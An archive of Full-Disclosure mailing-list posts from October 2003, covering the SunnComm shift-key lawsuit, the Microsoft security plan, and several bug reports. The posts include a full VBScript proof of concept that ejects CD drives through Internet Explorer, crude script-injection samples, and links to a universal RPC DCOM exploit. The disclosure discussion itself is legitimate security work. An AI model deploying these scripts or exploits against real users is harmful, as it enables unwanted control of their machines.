it out. What a bunch of dorks! Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ---Warning This e-mail is from outside Tesco - check that it is genuine. Tesco may monitor and record all e-mails. Disclaimer This is a confidential email. Tesco may monitor and record all emails. The views expressed in this email are those of the sender and not Tesco. Tesco Stores Limited, Tesco House, Delamare Road, Cheshunt, Herts, EN8 9SL: company number 519500. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Fri, 10 Oct 2003 09:25:16 CDT, Schmehl, Paul L said: Not only that, but by annoucing they are going to sue, they hype the press up so the general public knows about it as well. As it was, the security community and interested geeks were probably the only ones who would have noticed the issue, but now the whole world knows. Can you imagine Johnny Slowpoke, who knows little to nothing about computers, reading the article and saying, Honey, look at this. Some company made copy protection for CDs that was so lame that all you have to do is hold down the shift key to bypass it. Can you imagine that? How stupid is that? And now they're suing the student who pointed it out. What a bunch of dorks! Been there, done that, some people don't learn: Adobe. rot-13. Some poor guy from Moscow. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
On Fri, Oct 10, 2003 at 10:19:03AM -0400, Jonathan A. Zdziarski said: I'm not a legal expert, but IIRC, Brown vs. Rural Telephone Company ruled that it was not a violation of any copyright to publish information that belonged to another company...although the issues are You missed the passage of new copyright law, I.E. the DMCA. -- Shawn McMahon | Let every nation know, whether it wishes us well or ill, EIV Consulting| that we shall pay any price, bear any burden, meet any UNIX and Linux| hardship, support any friend, oppose any foe, to assure http://www.eiv.com| the survival and the success of liberty. - JFK pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] RE: Increased TCP 139 Activity
Choe.Sung Cont. PACAF CSS/SCHP wrote: Ron Dufresne wrote: If this is indeed the case, the ping sweep will all be packets of 92 byte, these are windows packets, and the recent rcpdcom sploits are the culprit. ICMP packets 92-bytes in size (72 bytes + 20 bytes for header) are usually due to a welchia infected host trying to propagate. It is not a rpcdcom exploit. I believe Windows `tracert' program uses 92 byte ICMP packets. \a V/r, Sung J. Choe PACAF CSS/SCHP, PACAF NOSC Information Assurance Analyst DSN: 315-449-4317, Comm: 808-449-4317 The information contained in this message or any of its attachments may be privileged and confidential and intended for the exclusive use of the intended recipient. If you are not the intended recipient any disclosure, reproduction, distribution or other dissemination or use of this communications is strictly prohibited. The views expressed in this e-mail are those of the individual and not necessarily of MIS Corporate Defence Solutions Ltd. Any prices quoted are only valid if followed up by a formal written quote. If you have received this transmission in error, please contact our Security Manager on 44 (0) 1622 723410. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
On Fri, 10 Oct 2003, Jonathan Grotegut wrote: Correct me if I'm wrong but how is holding down the shift key distributing tools for breaking through digital piracy safeguards? Shouldn't the keyboard manufacturers be sued since they are the ones that made the shift key and distributed it? No, they shouldn't - the 'tool' in question isn't a physical item (like a hammer or a keyboard), it's the procedure of holding down the shift key. Distributing this idea is what SunnComm have issues with - although any company worth their salt should not be relying on a 'feature' such as autorun that Microsoft themselves publish methods for disabling through TweakUI and careful editing of the registry. I hope that this lawsuit gets thrown out at the first opportunity. And then Sony/Phillips go after SunnComm for using the 'Compact Disc' trademark erroneously. -- Steven Harrison F Invalid file name, 0:1 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
At 10:06 AM 10/10/03 -0500, Ron DuFresne wrote: This story and suit is going to make its waves in the techie circles, but, will most likely not get alot of real play in the real world. http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml They dropped the suit later in the day; I don't think they have the stomach for the kind of battle that would probably have ensued. m5x ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
For the DMCA to apply, a copy-protection scheme must be effective. Given that the SunnComm technology doesn't work on a Windows system where CD auto-play has been turned off, I would assume that in court they will have a tough time convincing a judge or a jury that their technology meets the effectiveness requirement of the DMCA. Turning off CD auto-play is good idea from a security standpoint and has nothing to do with circumventing copy-protection schemes. Here's the wording of the DMCA: http://thomas.loc.gov/cgi-bin/query/F?c105:1:./temp/~c105Ate0xB:e11962 Sec. 1201. Circumvention of copyright protection systems `(a) VIOLATIONS REGARDING CIRCUMVENTION OF TECHNOLOGICAL MEASURES- (1)(A) No person shall circumvent a technological measure that *effectively* controls access to a work protected under this title. == `(2) No person shall manufacture, import, offer to the public, provide, or otherwise traffic in any technology, product, service, device, component, or part thereof, that-- `(A) is primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a work protected under this title; `(B) has only limited commercially significant purpose or use other than to circumvent a technological measure that effectively controls access to a work protected under this title; or `(C) is marketed by that person or another acting in concert with that person with that person's knowledge for use in circumventing a technological measure that effectively controls access to a work protected under this title. `(3) As used in this subsection-- `(A) to `circumvent a technological measure' means to descramble a scrambled work, to decrypt an encrypted work, or otherwise to avoid, bypass, remove, deactivate, or impair a technological measure, without the authority of the copyright owner; and `(B) a technological measure `effectively controls access to a work' if the measure, in the ordinary course of its operation, requires the application of information, or a process or a treatment, with the authority of the copyright owner, to gain access to the work. Richard PS. IANAL, YMMV, etc. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan A. Zdziarski Sent: Friday, October 10, 2003 11:04 AM To: Schmehl, Paul L Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Student faces suit over key to CD locks Does this mean they're going to attempt to sue Microsoft also, for publishing this feature in their Windows documentation? Or perhaps they'll take the RIAA's approach and sue anyone who uses the SHIFT key. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
In order to install the software you have to accept their EULA which says it is installing software to access the media. Did you not read the article? Mark Bassett Network Administrator World media company Omaha.com 402-898-2079 -Original Message- From: Nick Jacobsen [mailto:[EMAIL PROTECTED] Sent: Thursday, October 09, 2003 6:40 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m it seems to me the perfect chance for a countersuite... cause at least as far as I know, most state's definition of computer crime would include installing software on a machine withough the owners permission. or knowlege.. and since that is what SunnComm's protection is doing... Nick Jacobsen (Ethics) [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
Looks like Sunncomm isn't among the folks incapable of learning: http://www.p2pnet.net/article/8380 Sunncomm responded with angry threats of legal action and lawsuits under the DMCA. But last night Sunncomm ceo Peter Jacobs said a successful lawsuit would do little to reverse the damage done by Halderman's disclosure and would probably hurt Sunncomm by making computer scientists think twice about researching copy-protection technology. -- Shawn McMahon | Let every nation know, whether it wishes us well or ill, EIV Consulting| that we shall pay any price, bear any burden, meet any UNIX and Linux| hardship, support any friend, oppose any foe, to assure http://www.eiv.com| the survival and the success of liberty. - JFK pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
It seems SunnComm has reconsidered their position: http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml They claim they don't want to hurt research but I think they know they can't win. -- Patrick Dolan UNT Computing and Information Technology Center PGP ID: E5571154 Primary key fingerprint: 5681 25E4 6BE6 298E 9CF0 6F8D B13B 2456 E557 1154 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Local DoS in windows.
--- [Affected] --- We have only tried it in windows Xp. --- [Bug Details] --- http://www.geocities.com/visitbipin/win_dos.jpg The image is self explanatory... --- [Description] --- When you click to any close, maximize or minimize button's in windows Xp, [No matter whether it's IE or a WordPad] surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON ] we've seen gradual/slow rise in page-file use too...!!! --- [Conclusion] --- Hell... local DoS! That could be used by employees working at different terminal. (O; --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn --- [I want a JOB/scholarship... anyone??? - hUNT3R] --- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
On Friday 10 October 2003 11:33, [EMAIL PROTECTED] wrote: Been there, done that, some people don't learn: Adobe. rot-13. Some poor guy from Moscow. I concur, but the Princeton grad student that published the paper still has to defend himself in court -- which is both time consuming and costly to all. IMHO, they are just bullying him around, and that is deplorable. Cheers, Ken van Wyk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
[EMAIL PROTECTED] wrote: I hope that this lawsuit gets thrown out at the first opportunity. And then Sony/Phillips go after SunnComm for using the 'Compact Disc' trademark erroneously. AFAIK, This doesn't break the CD standard. the disks are perfectly readable dual-session disks, just with nasty malware on them ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
--- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! --- [Proof of concept] --- We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm --- [Bug Details] --- html body pTHIS IS hUNT3R aka: Bipin Gautam/p scriptalert(scriptlocation.href=http://www.ysgnet.com;/script)/script /body /html html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html * --[Description]--- The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! We found JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for document.write(); function. This means that this script is going to choke bad and you wont get any output but just the ); thats all. This script is working. Its not that it is not working. It works in the starting script tag but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML, the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. but we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript /script first closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script. --- [Conclusion] --- This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen. --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level. http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
bipin gautam wrote: --- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! Doesn't do squick with Moz 1.5b (non-RC) on WinXP http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- I have some weeds in the backyard that are bugging the crap outta me. Is that all you got? -jim ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Sunncomm backs down from shift key prosecution
http://www.theinquirer.net/?article=12041 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
On Fri, 10 Oct 2003 10:38:59 -0700 (PDT) bipin gautam [EMAIL PROTECTED] wrote: --- [Effected] --- It's spelled affected ;P All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030813 Mozilla Firebird/0.6.1 Definitely _not_ vulnerable... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10 m
More importantly if they do win and it is overturned on appeals due to first amendment rights then a portion of the DMCA has been ruled unconstitutional. I doubt they, their clients or others in their industry would want that. James Cupps Information Security Officer Sappi Fine Paper North America 207-854-7065 -Original Message- From: Patrick Dolan [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:45 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m It seems SunnComm has reconsidered their position: http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml They claim they don't want to hurt research but I think they know they can't win. -- Patrick Dolan UNT Computing and Information Technology Center PGP ID: E5571154 Primary key fingerprint: 5681 25E4 6BE6 298E 9CF0 6F8D B13B 2456 E557 1154 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This message may contain information which is private, privileged or confidential and is intended solely for the use of the individual or entity named in the message. If you are not the intended recipient of this message, please notify the sender thereof and destroy / delete the message. Neither the sender nor Sappi Limited (including its subsidiaries and associated companies) shall incur any liability resulting directly or indirectly from accessing any of the attached files which may contain a virus or the like. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
Dude, you need to read the reply(s) to your original post. If that doesn't clear it all up for you and you're really serious about your sploit, you should check out mine: html body span style='display: none;' id='leetShellCode' #80;#108;#101;#97;#115;#101; #103;#111; #97;#119;#97;#121;#33; /span script language='JavaScript1.2' type='text/javascript' alert(document.getElementById('leetShellCode').innerHTML); /script /body /html On Fri, Oct 10, 2003 at 10:38:59AM -0700, bipin gautam wrote: --- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! --- [Proof of concept] --- We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm --- [Bug Details] --- html body pTHIS IS hUNT3R aka: Bipin Gautam/p scriptalert(scriptlocation.href=http://www.ysgnet.com;/script)/script /body /html html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html * --[Description]--- The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! We found JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for document.write(); function. This means that this script is going to choke bad and you wont get any output but just the ); that?s all. This script is working. Its not that it is not working. It works in the starting script tag but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML, the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. but we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript /script first closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script. --- [Conclusion] --- This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen. --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level. http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m
Patrick Dolan [EMAIL PROTECTED] wrote: It seems SunnComm has reconsidered their position: http://www.dailyprincetonian.com/archives/2003/10/10/news/8797.shtml Good thing. Can you imagine the implications a successful Shift key suit might have on future use of the miscreant Delete key? Horrors. Regards, Mary Landesman Antivirus About.com Guide http://antivirus.about.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Student faces suit over key to CD locks
Yes, they will have to think twice about the QUALITY of the copy-protection they are creating. (as they should) -DB On Fri, 2003-10-10 at 09:53, Shawn McMahon wrote: Looks like Sunncomm isn't among the folks incapable of learning: http://www.p2pnet.net/article/8380 Sunncomm responded with angry threats of legal action and lawsuits under the DMCA. But last night Sunncomm ceo Peter Jacobs said a successful lawsuit would do little to reverse the damage done by Halderman's disclosure and would probably hurt Sunncomm by making computer scientists think twice about researching copy-protection technology. -- --- Darren Bennett - CISSP Sr. Systems Administrator/Manager Science Applications International Corporation Advanced Systems Development and Integration --- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft Outlines Security Plan (Balmer Blows Hard)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Microsoft Outlines Security Plan Fri Oct 10, 1:00 AM ET washingtonpost.com By Mike Musgrove ^^ I wish those people just would be quiet, he said of computer researchers who publish vulnerabilities in Microsoft's products. ^^ Microsoft chief executive Steven A. Ballmer said yesterday that there is much, much, much left to do to protect computer users from viruses, worms and other malicious software. He outlined new steps the company plans to take to address this problem -- while acknowledging that these changes can't solve it. There is no silver bullet, Ballmer said in a speech at the company's Worldwide Partner Conference in New Orleans. Even if all the vulnerabilities were fixed tomorrow morning in all of the products, there's still 600 million computers . . . that wouldn't have all of these vulnerabilities patched. Recent devastating software worms and viruses have earned Microsoft intense criticism, as well as a class-action lawsuit filed in Los Angeles Superior Court last week that accuses the company of not doing enough to guard the personal information of Windows users. Ballmer described several changes to Microsoft's security strategy. He said the Redmond, Wash., company will issue security updates on a monthly schedule, except in emergency situations, to make it easier for users to keep their personal computers up to date. It will ship Windows with security precautions activated that are now left off -- for instance, a firewall program that stops Internet worms such as Blaster. He also said the company will release security-focused updates to Microsoft Windows XP (news - web sites) and Windows Server 2003 in the first half of next year. Computer security is without question the number one priority for the company, Mike Nash, vice president of Microsoft's security business unit, said in a phone interview after Ballmer's speech. He added that employees from across the company had been pulled to work on security efforts. Ballmer said that, since most virus and worm attacks come only after vulnerabilities have been disclosed by the company or by security researchers, Microsoft is working with computer-security firms to make sure that they do not announce vulnerabilities before Microsoft has designed a fix. I wish those people just would be quiet, he said of computer researchers who publish vulnerabilities in Microsoft's products. It would be best for the world. That's not going to happen, so we have to work in the right fashion with these security researchers. But no matter how fast Microsoft pushes out patches, users still have to install them -- something Microsoft is trying to address with a new educational campaign that Ballmer also announced yesterday. I think people are taking computer security a bit more seriously; some of our clients are still cleaning up from the Blaster virus, said Josh Pennell, chief executive and founder of computer security firm IOActive Inc. Computer security is almost like car insurance. Nobody wants it until their car gets totaled. Jeff Jones, senior director of trustworthy computing at Microsoft, said earlier this week that his company had seen an increase in the numbers of users downloading security patches after an outbreak of viruses that began in August. I hesitate to speculate on whether there is long-term learning going on there, he added. Ken Dunham, director of malicious code at iDefense Inc., a computer security firm based in Reston, said Microsoft's plan to release only monthly updates may give hackers extended time to exploit a vulnerability before a patch is released. Other security professionals noted the lack of specifics in Ballmer's speech. There wasn't any detail to what kind of tools they will provide, said Richard Ku, product manager at Trend Micro Inc., a developer of anti-virus software. Announcements never secured anything, said Bruce Schneier, founder and chief technology office of Counterpane Internet Security Inc. The fact that some guy gets on stage and says a bunch of words does not make your computer secure. Michael Frodyma, president of BooNet Inc., an Internet service provider based in Bethesda, said he worries about the unintended consequence of Microsoft's security patches. Some have disabled the computers of his customers -- who have then blamed his firm for the problem. One is frightened of what's around the next corner with Microsoft, he said. You wake up the next day and suddenly something isn't working. - -- Jeremiah Cornelius, CISSP, CCNA, MCSE+I farm9 Information Security email: [EMAIL PROTECTED] Phone: 510.835.3276 mobile: 415.235.7689 Be cheerful while you are alive - --Phathotep, 24th Century B.C. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux)
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: For us that can not interpret the site, what more information can be provided. Bobby FYI, the site is in Russian. Here are the steps for enlightening yourself: 1. Visit your favorite search engine. 2. Type the words online translator russian (without quotation marks) into the query field. 3. Visit one of the many free or paid translating services that are listed there. 4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work. 5. Read the slightly stilted but informative result. FWIW, entering that query into google and clicking I'm feeling lucky gives good results. Good luck. HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re : [VERY] BAD news on RPC DCOM Exploit
as Alex said This code work with *all security fixes* . It's very dangerous ... http://www.k-otik.com/exploits/10.09.rpc2universal.c.php http://www.k-otik.com/exploits/10.09.rpcunshell.asm.php god bless dcom ! - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
I get Permission Denied scripting error: Win 98, IE 6 SP1 all patches, Wmplayer 9.00.00.2980 Regards, Brent -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Lorenzo Hernandez Garcia-Hierro Sent: Friday, October 10, 2003 5:13 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit ) Hi friends, I'm not very happy with this , i have done an online test for eject cds in a MS Internet Explorer and i have tested it in all the computers of my house but i was surprised when i checked that the last version of MSIE allows the execution of the script in the following sec. zones: . LOCAL/INTRANET . REMOTE/INTERNET I tested it in default values and the exploit is executed , i edited the values and again it was executed. Am i discovering a new vulnerability in MS Internet Explorer ? I'm not sure because there are lots of known holes in MSIE. Suggestions and help is completely welcome. The best regards, PS: This is the code of the exploit: - SCRIPT LANGUAGE=VBSCRIPT rem -- rem No Secure Root Group Security Research remCoder: Trulux / Lorenzo Hdez G-H rem -- remhttp://www.nsrg-security.com rem -- rem - CREATE WINDOWS MEDIA PLAYER OBJECT rem - Set LARRYINTHEWILD = CreateObject(WMPlayer.OCX.7 ) rem - rem - SETTING SOME VARIABLES FOR EJECT CD UNITS rem - Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection rem - rem - EJECTING ROUTINE rem - if RIAAsaysBLAH.Count = 1 then For i = 0 to RIAAsaysBLAH.Count - 1 RIAAsaysBLAH.Item(i).Eject Next ' cdrom End If rem - END /SCRIPT -- NOTE: i don't know if this is a known security hole , if this was discovered before , i'm sorry ( and a little sad :-( ). you can test it online: http://test-zone.nsrg-security.com/browser/msie/cdrom ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
Today I had the pleasure of receiving a digitally signed e-mail on my newest machine, running XP Pro. Since it is intended for business use, and connected to the internet, I am about halfway hardening it. One of the things I did was turn off HTML e-mail in OE (6 Sp1). On receiving a digitally signed e-mail, I got OE asking me whether: Security Help Digitally Signed Message This message has been digitally signed by the sender. Signed e-mail from others allows you to verify the authenticity of a message -- that the message is from the supposed sender and that it has not been tampered with during transit. Signed mail messages are designated with the signed mail icon. Any problems with a signed message will be described in a Security Warning which may follow this one. If there are problems, you should consider that the message was tampered with or was not from the supposed sender. Don't show me this Help screen again. Continue Alas, the Continue button was just text, just as the tick box to not show me this help screen again was not there. This means I'll have to re-enable HTML mail, and wait for the next signed mail to arrive.to turn it off. I wonder what will happen to messages that have been tampered with when I have turned off HTML mail? I will probably get a warning, but will not be able to go beyond that, since it is in ASCII and that does not (AFAIK) support nice buttons. So in order to enable signed mail, I will have to enable HTML in my mail Have a nice day, ya'all Yossarian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
Alas, the Continue button was just text, just as the tick box to not show me this help screen again was not there. This means I'll have to re-enable HTML mail, and wait for the next signed mail to arrive.to turn it off. I wonder what will happen to messages that have been tampered with when I have turned off HTML mail? I will probably get a warning, but will not be able to go beyond that, since it is in ASCII and that does not (AFAIK) support nice buttons. So in order to enable signed mail, I will have to enable HTML in my mail Good evening Yossarian, I'm sorry, do I understand correctly when you say that the mechanism for verifying / managing signed e-mail seemed to be included within the e-mail itself -- in html, no less? Although I'm unfamiliar with certificate-based digitally-signed e-mail (I'm a pgp/gpg kind of guy) I can't help but be very suspicious. Also, you mentioned that the machine will be used for business purposes and (directly?) connected to the internet. Might I recommend against using OE for e-mail? Mozilla Thunderbird is what I recommend for Microsoft folks. take care, Cael ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] About the supposed WinXp Local DoS ?
Hi there friends, I've seen the supposed ( and a little silly thing ) Windows XP LOCAL DoS , and i was looking at the website , i'm not sure because i didn't try to test it but i seems completely false and funny joke . Ok , but , what are the original conditions of the system that the author of the report ? It can be easily probed by providing the debug files of the executables involved because , screenshots rae not a good probe of conceps , and , of course , things like "...click about 1000 times.." are commonly used in the everyday hoaxes. If someone have tested successful it , please tell me howto . best regards, ---0x00-Lorenzo Hernandez Garcia-Hierro0x01-/* not csh but sh */0x02-$ PATH=pretending!/usr/ucb/which sense0x03- no sense in pretending! _PGP: KeyfingerprintB6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2ID: 0x9C38E1D7**No Secure Root Group Security Research Team http://www.nsrg-security.com__
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
Alas, the Continue button was just text, just as the tick box to not show me this help screen again was not there. This means I'll have to re-enable HTML mail, and wait for the next signed mail to arrive.to turn it off. I wonder what will happen to messages that have been tampered with when I have turned off HTML mail? I will probably get a warning, but will not be able to go beyond that, since it is in ASCII and that does not (AFAIK) support nice buttons. So in order to enable signed mail, I will have to enable HTML in my mail Good evening Yossarian, I'm sorry, do I understand correctly when you say that the mechanism for verifying / managing signed e-mail seemed to be included within the e-mail itself -- in html, no less? Although I'm unfamiliar with certificate-based digitally-signed e-mail (I'm a pgp/gpg kind of guy) I can't help but be very suspicious. Also, you mentioned that the machine will be used for business purposes and (directly?) connected to the internet. Might I recommend against using OE for e-mail? Mozilla Thunderbird is what I recommend for Microsoft folks. The problem is that by turning off HTML for e-mail as a security measure, you disable the correct use of digitally signed e-mail, which by design is a security measure. I cannot verify this behaviour for Outlook since I have no working system with said software I am not saying anything about the usefullness (or the opposite) of this signing technology or its alternatives, since everything that needs to be said about it is all over the Internet. Like I said, it is a new machine. Since my business IS security, I use on some systems what Joe Average uses. So I use MS boxes in daily routine work - it keeps me very up to date on threats. Sort of Honeypot thingie but since it is partly production, I have to solve every prob encountered Living dangerously on the web. Top O' the morning - it is past midnight! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
